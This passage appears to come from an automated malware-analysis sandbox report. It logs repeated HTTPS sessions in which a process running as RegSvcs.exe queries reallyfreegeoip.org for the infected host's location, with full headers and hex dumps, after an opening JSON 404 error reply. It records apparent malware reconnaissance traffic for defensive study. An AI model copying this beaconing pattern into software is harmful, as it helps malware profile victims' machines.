                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:19:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.649833104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:32 UTC850INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:32 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862361
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jshIUSC4iTuP8e1PIhG8DuD5Cgs2ECumB%2BdJL6F6pSViL66xoIeDM1tDg2byUHg7fzvPNC9KVUq6Gq7VY8SaMe3qlerg5mMtuLZXVEllwpZXWmKff4Qm4nuFCPsGRQN6tTEXg6nH"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c9909924344-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1599&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1813664&cwnd=47&unsent_bytes=0&cid=656e05cccf11a143&ts=177&x=0"
                                                                                                              2025-01-10 22:19:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.649841104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:33 UTC856INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:33 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862362
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmb18uB%2FRT6C58Pm1GXnAIddSkxnlOlj5y3uQcdovZEaOCCD6y%2Fj0Uvpi3ue8mVv3S8gWtgTybqm5z5tIwRPaE0SAIJiumTx%2BBLMT82VU9yweFHmoNSfzIc1okr0xYZ5dWPZp7Xs"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000c9e9f39c327-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5089&min_rtt=1602&rtt_var=2831&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1822721&cwnd=189&unsent_bytes=0&cid=cdfaa9e31b455641&ts=158&x=0"
                                                                                                              2025-01-10 22:19:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.649851104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:34 UTC855INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:34 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862363
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FX6G1e6JCBqYDyPIhPREKfyvCJFB5TqshreYx3ZrMzvfISHCqn8Y8oudq%2Bv9riP6TD99hcWVUxBpfqwXht2FLtlQPLOAZkSCIYa7iOebXhW8HDZ%2FnOUBvlFw7EdIM1s%2BsjcdPJbw"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000ca6dfc91875-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1620&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1725768&cwnd=153&unsent_bytes=0&cid=b913ee259f542c6a&ts=148&x=0"
                                                                                                              2025-01-10 22:19:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.649862104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:36 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:36 UTC865INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:36 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862365
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEj8Va%2B6H6TN4gmIa%2FYwcRxL3nmNx%2BgPz2XW%2Fm45awpKoSOAdhDubF0X0XkQn0%2FJCghh92h2faAHuxyRL%2FEpvnN84URzA1o5Nxx166y5Czedh%2FrEeK07vBqhObNn%2FY1j5r55Z9wy"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000caf183f8cda-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1742&rtt_var=670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1611479&cwnd=243&unsent_bytes=0&cid=89182e00b7e36b2f&ts=166&x=0"
                                                                                                              2025-01-10 22:19:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.649872104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:37 UTC867INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:37 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862366
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lEWMD1LW%2B5y9wbvkvVg%2F%2F01awqo6%2FZJiZBuLXladlOJMeccQBL%2FVQr%2BOhSh2bCD%2Ft7lQEacEHVqEWxqMEVAVtT0vLjm2t0s8ZYEWVJoiNhhPoCb9%2B36rJQEdR%2FtEvVascFoTWXPE"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000cb76df141a6-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1563&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1793611&cwnd=241&unsent_bytes=0&cid=7147d0e6b1e1a2c3&ts=150&x=0"
                                                                                                              2025-01-10 22:19:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.649882104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:38 UTC852INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:38 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862367
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KW5BXpBu5xJnyemn0VK5f54qWaBCi24toySOiWodA3%2Fvt1qzThO5isd4lXgOZntgDithSIIQrd6Xd%2FwuQcjKqz2UxZM8n6UrJ6lWMswQnYtrzswBAfnrnlryMX0WmnFhEDDeRQeg"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000cbfaaa74344-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1787&rtt_var=717&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1634023&cwnd=47&unsent_bytes=0&cid=2ec29d9da78b2a1d&ts=161&x=0"
                                                                                                              2025-01-10 22:19:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.649893104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:40 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-10 22:19:40 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862369
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k7BWCIhdHuBRubAI4qUkWojsWQD6vih4MBQ3I5NF0H53%2FXKXtQAMVgQys%2FnxWD82DM9aVTSP8Vvo0h9uf5C%2BViAeSpP79fy7M7ryMoW%2FEiSjAGTjetx1IUrcB0U5ME3xM1xajm4T"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000cc7d93cc327-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1612&rtt_var=640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1662870&cwnd=189&unsent_bytes=0&cid=9ac869e44c01f51e&ts=155&x=0"
                                                                                                              2025-01-10 22:19:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.661851104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:41 UTC857INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:41 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862370
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nlecSpibg3dAYIywmUdQjNAPcf54cWkanGf%2BLVCzmakSc2k58BL0MxeXbMMv5xXrWaBCI82DtYftAKtnKy6apT1MaWs4IF%2FaQcWEUahw3n0x725ZCpS3d%2FEKB5Exd1%2BMam4VS6TX"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000cd00cbe8cda-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1760&rtt_var=666&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1636771&cwnd=243&unsent_bytes=0&cid=15ad3f2c6600ddba&ts=143&x=0"
                                                                                                              2025-01-10 22:19:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.661863104.21.32.14437076C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:19:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:19:42 UTC850INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:19:42 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 1862371
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CStzoQuGH9lxLsxz2wkpFuxDCi5OewBW0GY8sSsnignkynw03vUNDNhtOk%2BI1zRpNcvw5FVlY6CJp2aGUzoSC34YrCz9YGIMDw4QyR6Jz8XrGavFXBvT4JTYKrVXa7aYK8ln1LFF"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90000cd82ddd4344-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1658&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1761158&cwnd=47&unsent_bytes=0&cid=f6986e5575da47bd&ts=141&x=0"
